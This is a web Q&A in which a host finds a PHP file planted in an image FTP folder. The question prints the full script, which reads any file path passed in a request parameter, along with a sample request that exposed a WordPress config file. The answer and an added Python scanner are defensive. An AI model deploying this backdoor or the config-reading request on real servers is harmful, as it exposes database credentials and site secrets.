Tags: php, security, webserver, plesk

Is this PHP code malicious and how can I protect my hosting?


I host a website for a client and we have been asked to host some extra images for the client's other third-party website shop.

So I created a secondary FTP account that had its root set to a subfolder on the hosting.

The client had the web designer who was building out the layout for this external website place all the images in this FTP space.

Today I noticed some warning notices in the error_log and saw that they were coming from a PHP file that was also within this FTP space.

The contents of the PHP file were this:

<?php
ini_set('display_errors',1);
$file1=trim($_REQUEST['f1']);
$read1=file_get_contents($file1);
$read1 = rawurlencode($read1);
echo "document.write(unescape(\"$read1\"))";
?>

When I first read the code I couldn't figure out why it was in the FTP space or what it did, but I started playing around by adding some paths to the f1 parameter to see what response was returned, and I found that I could output my WordPress install's wp-config.php file, which is one folder up from this FTP's root folder.

E.g. by running this parameter through the PHP script, it output the contents of my config: domain.com?f1=/mnt/storage/vhosts/domain.com/httpdocs/wordpress/wp-config.php

Now I am just trying to figure out if this code could have been placed in the FTP storage for any reason other than to be malicious.

How can I protect my files from being read like this when giving out FTP access to a subfolder on the hosting?

Thanks.


Solution

  • The script opens the file passed in the GET parameter, reads it, URL-encodes it and then sends it to the browser wrapped in some JavaScript that decodes it client-side.

    The script is virtually guaranteed to be written with malicious intent. While outputting the contents of a file may have legitimate uses, the (very basic) obfuscation technique used here pushes it over the edge of any reasonable doubt.

    The FTP root of your user may be protected, but it seems that you do not run separate PHP interpreters for your users. That means that any user who can write code to their webspace and execute it through the PHP interpreter may run code as whatever user the PHP interpreter is running as. Since PHP necessarily needs to read the WordPress configuration, there is little you can do to secure the current setup.

    Ideally, you will want to isolate every user in their own chroot or Docker instance with their own PHP interpreter. Short of that, you should absolutely not allow FTP access or any other method for uploading files on your system, as the security model is simply not designed to withstand this level of user access.
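The answer's point is that a shared interpreter makes any PHP file dropped into an upload-only directory a read of everything PHP can read. Isolation (a separate interpreter per user, chroot, open_basedir) is the fix; a complementary defender-side check is to sweep the directories handed to third parties for files the web server would execute at all, and to flag the pattern seen above, where a request parameter ends up as the path given to a file-reading function. The following is an added example written for this page, not code from the question or the answer; it builds a constructed sample tree in a temporary directory (an image plus a copy of the script from the question), and its line-based taint heuristic, the list of sinks and the set of extensions are assumptions, not an exhaustive scanner.

```python
import os
import re
import shutil
import tempfile

# Extensions a typical Apache/nginx + PHP setup hands to the interpreter (assumed list).
PHP_EXTENSIONS = {".php", ".phtml", ".php3", ".php4", ".php5", ".php7", ".phar"}

# Functions that read, include or display a file by path. Longer names come first so the
# regex alternation picks "file_get_contents" before the bare "file".
FILE_SINKS = (
    "file_get_contents", "readfile", "fopen", "show_source", "highlight_file",
    "include_once", "require_once", "include", "require", "file",
)
SINK_RE = re.compile(r"\b(" + "|".join(map(re.escape, FILE_SINKS)) + r")\b\s*\(?")
SOURCE_RE = re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE|FILES)\b")   # request superglobals
ASSIGN_RE = re.compile(r"^\s*(\$\w+)\s*=(?!=)")                     # "$var = ..." at line start
VAR_RE = re.compile(r"\$\w+")

# The script from the question, embedded as sample input for the sweep.
SAMPLE_SCRIPT = (
    "<?php\n"
    "ini_set('display_errors',1);\n"
    "$file1=trim($_REQUEST['f1']);\n"
    "$read1=file_get_contents($file1);\n"
    "$read1 = rawurlencode($read1);\n"
    "echo \"document.write(unescape(\\\"$read1\\\"))\";\n"
    "?>\n"
)


def scan_php_source(source: str) -> list:
    """Line-based taint walk (heuristic): a variable assigned on a line that mentions a
    request superglobal or an already-tainted variable becomes tainted; a file sink on a
    line that mentions either is reported with the line number and the tainting name."""
    tainted = set()
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        code = line.split("//", 1)[0]          # drop trailing line comments
        direct = SOURCE_RE.search(code)
        via = sorted(set(VAR_RE.findall(code)) & tainted)
        sink = SINK_RE.search(code)
        if sink and (direct or via):
            findings.append({"line": lineno, "sink": sink.group(1),
                             "via": via[0] if via else direct.group(0)})
        assign = ASSIGN_RE.match(code)
        if assign and (direct or via):
            tainted.add(assign.group(1))       # taint propagates through the assignment
    return findings


def scan_upload_dir(root: str) -> list:
    """Walk an upload-only directory (the FTP root handed to a third party). Any file the
    web server would execute as PHP is a finding by itself; its body is scanned as well."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in PHP_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            findings.append({"file": rel, "kind": "php_file_in_upload_dir"})
            with open(path, encoding="utf-8", errors="replace") as fh:
                for hit in scan_php_source(fh.read()):
                    findings.append({"file": rel, "kind": "request_controlled_file_read", **hit})
    return findings


def build_sample_tree() -> str:
    """Constructed sample: an images folder holding one PNG header and the script above."""
    root = tempfile.mkdtemp(prefix="ftp-images-")
    os.makedirs(os.path.join(root, "banners"))
    with open(os.path.join(root, "banners", "logo.png"), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n")         # constructed: PNG magic bytes only
    with open(os.path.join(root, "banners", "thumbs.php"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_SCRIPT)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    try:
        for finding in scan_upload_dir(sample_root):
            print(finding)
    finally:
        shutil.rmtree(sample_root)
```

Run it against the real FTP root instead of the sample tree by calling scan_upload_dir with that path; an upload-only directory for images should produce no findings at all, so any php_file_in_upload_dir hit is worth looking at regardless of what the file contains. The heuristic deliberately errs toward reporting: it does not follow data through function calls or across files, so it is a sweep to run on a schedule, not a substitute for the interpreter isolation the answer recommends.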